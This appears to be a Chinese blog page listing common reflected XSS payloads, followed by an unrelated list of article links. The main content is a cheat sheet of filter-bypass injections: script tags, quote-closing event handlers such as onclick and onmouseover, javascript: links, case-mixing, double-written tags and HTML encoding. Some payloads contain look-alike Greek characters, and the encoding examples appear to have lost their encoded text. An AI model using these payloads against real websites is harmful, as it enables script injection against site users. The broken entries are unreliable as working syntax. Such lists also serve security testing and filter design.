当前位置: 首页 > news >正文

反射型xss的常用语法

Xss反射型常用语法:

  1. 普通语法:  <script>alert(1)</script>
  2. 构造闭合语法:  "><script>alert(1)</script>
  3. 当引号被转义时的语法:   1' οnclick='alert(2)' 再次点击输入框时就会出现弹窗
  4. 当3.的双引号不行时则考虑使用双引号:1 "onclick"=alert(2)
  5. 当</>被过滤时便不能用标签可以考虑使用出发事件: 1"  οnmοuseοver="alert(1)"
  6. 当5.的双引号不行时则考虑使用单引号:  1'  οnmοuseοver='alert(1)'
  7. 当上述几种都不行时可以考虑使用a标签:11"><a href="javascript:alert(1)">
  8. 大小写绕过:11"><a HREF="javascript:alert(1)">      "><sCript>alert(1)</scRipt>

<SCRIPT>alert(1)</SCRIPT>

    9.双写绕过:"><SCRSCRIPTIPT>alert(/xss/)</SCRSCRIPTIPT>

    10.Html编码绕过:

javaSCRIPT:alert(1)

这里属于直接编码所所有的进行

把所需要过滤的字段进行html编码就可以进行绕过,这里绕过的时比如

href     href

SCRIPT    SCRIPT

相关文章:

  • 二叉树 经典例题
  • 重装系统以后无法git跟踪
  • 爬虫工作量由小到大的思维转变---<第二十八章 Scrapy中间件说明书>
  • Delphi6函数大全4-SysUtils.pas
  • linux查看系统版本、内核版本、CPU核数/线程/型号、内存大小等
  • lambda表达式和包装器
  • 分布式IO在工业自动化中的应用
  • 【教学类-43-11】 20231231 3*3宫格数独提取单元格坐标数字的通用模板(做成2*2=4套、3*2=6套)
  • 【Leetcode】1154. 一年中的第几天
  • Go语言程序设计-第6章--方法
  • 解决SpringBoot中出现的跨域请求问题
  • RainBond 构建组件 rbd-chaos 故障解决 【真实案例】
  • 单例模式的双重检查锁定是什么?
  • 如何使用ModuleShifting测试Module Stomping和Module Overloading注入技术
  • LeetCode75| 二叉搜索树
  • 【译】React性能工程(下) -- 深入研究React性能调试
  • android百种动画侧滑库、步骤视图、TextView效果、社交、搜房、K线图等源码
  • Apache的80端口被占用以及访问时报错403
  • CAP理论的例子讲解
  • co模块的前端实现
  • crontab执行失败的多种原因
  • Cumulo 的 ClojureScript 模块已经成型
  • Docker 笔记(1):介绍、镜像、容器及其基本操作
  • ES6 学习笔记(一)let,const和解构赋值
  • Java 实战开发之spring、logback配置及chrome开发神器(六)
  • java中具有继承关系的类及其对象初始化顺序
  • Python 使用 Tornado 框架实现 WebHook 自动部署 Git 项目
  • Python_OOP
  • Redis 中的布隆过滤器
  • uva 10370 Above Average
  • Vue 动态创建 component
  • WordPress 获取当前文章下的所有附件/获取指定ID文章的附件(图片、文件、视频)...
  • 阿里云爬虫风险管理产品商业化,为云端流量保驾护航
  • 从零搭建Koa2 Server
  • 技术:超级实用的电脑小技巧
  • 微信小程序上拉加载:onReachBottom详解+设置触发距离
  • 想写好前端,先练好内功
  • 再谈express与koa的对比
  • 职业生涯 一个六年开发经验的女程序员的心声。
  • ​2020 年大前端技术趋势解读
  • ​LeetCode解法汇总2808. 使循环数组所有元素相等的最少秒数
  • ​人工智能书单(数学基础篇)
  • ​软考-高级-信息系统项目管理师教程 第四版【第19章-配置与变更管理-思维导图】​
  • # 安徽锐锋科技IDMS系统简介
  • #etcd#安装时出错
  • (1)(1.9) MSP (version 4.2)
  • (bean配置类的注解开发)学习Spring的第十三天
  • (C语言)球球大作战
  • (poj1.3.2)1791(构造法模拟)
  • (代码示例)使用setTimeout来延迟加载JS脚本文件
  • (附源码)计算机毕业设计ssm基于B_S的汽车售后服务管理系统
  • (六)Hibernate的二级缓存
  • (每日持续更新)jdk api之StringBufferInputStream基础、应用、实战
  • (十三)Java springcloud B2B2C o2o多用户商城 springcloud架构 - SSO单点登录之OAuth2.0 根据token获取用户信息(4)...
  • (四)【Jmeter】 JMeter的界面布局与组件概述